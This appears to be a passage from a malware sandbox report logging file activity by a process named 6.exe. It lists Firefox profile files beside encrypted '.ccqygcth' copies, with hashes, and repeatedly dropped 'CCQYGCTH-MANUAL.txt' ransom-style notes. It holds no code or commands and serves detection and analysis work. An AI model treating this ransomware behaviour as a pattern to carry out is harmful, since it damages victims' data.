C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.ccqygcth
binary
MD5: 4ae48158540b113b7baca663dce8702c
SHA256: e5f1e0594a5fabc7abf945924f38bf7361847e3c3694c1ba4b2534a37dabc901
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.ccqygcth
binary
MD5: deeca5242eda20892684354b2b2e68a0
SHA256: 340eb075847d10414baee091f964fe06d981ef1d157342b721f2448dfe38657b
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.ccqygcth
binary
MD5: 9ebd63f33d1b7e412f30e11ff87e832c
SHA256: 46293689a629c5c12886132fd4844d3e50cb76fc12fe0f1fce97ec5b26bdd649
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.ccqygcth
binary
MD5: a01ef6c1597ff6ed9d0fdd3b1f6b7386
SHA256: a52f9a46e232dbb55dd1c8056fdc3349d94223839ba8a734255990245d192fa9
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.ccqygcth
binary
MD5: a577da17e8ccde1aac128442eb0a909f
SHA256: 20691cc433f705b1f0cbf1f110258ec6dd94babc8f72ab19be2bc18692cfb3e1
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.ccqygcth
binary
MD5: 14d915a0cab5eae125ad91d6b9f1b55b
SHA256: ce5297159a53b14587343fd74df3c5549e9a3f0aa8c724feebe74fdec4a2d6c5
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.ccqygcth
binary
MD5: a1000356bc02ef8b79e0fc7e72c9255e
SHA256: 12034e73360166d5fd153fa0348a314370f94351cd02f16636537d8d68815bf9
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.ccqygcth
binary
MD5: b50d9c66807a4b621ded0ee3bafaf7d4
SHA256: 16239a8ea1dcb14469bb90b6d10f499de4b2978e9024126f51a456ee7920eeca
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.ccqygcth
binary
MD5: 4c5e7d19884dc2f55ba8d6fd8d5a9e51
SHA256: 4b1a96b0c82cb4d4b900a02d9719d821f2b48127b6f03566b9e39125429a98d5
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite.ccqygcth
binary
MD5: 6c6cea93ec30f2ee5035320e90916289
SHA256: 6c397a515471a5cdb8a5be5abda64aecc6e8ae7e6120b57d2bfa92ed08bc25d8
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.ccqygcth
binary
MD5: d686e51ad7937b43478e6cc0b920d0fd
SHA256: ff3cc5a9b7d437a7c236bfd00e7935fa36ee7ac4a5e9fe539330b15c78585d6c
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.ccqygcth
binary
MD5: 77c6a16d558fb91a4544ef33f6fa5b77
SHA256: 60fb39acbc4a0a120304f6381216c1d8b53a579c419f1e2629f2c4cc24bf7823
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite.ccqygcth
binary
MD5: 428d334cdc5ca56571e1a108ba9a9b7e
SHA256: 0c2f5712c74a00df03214d374199c296c1bc33bd04a524e3b93ab394e4d82d8f
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2.ccqygcth
binary
MD5: 41a6ac90ac03c3234aaae55b1b1e894b
SHA256: ba2a4eab1d624ac2da0a3028a61712b6e40fcb77f9157b95f7f4a41f13965bcf
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata.ccqygcth
binary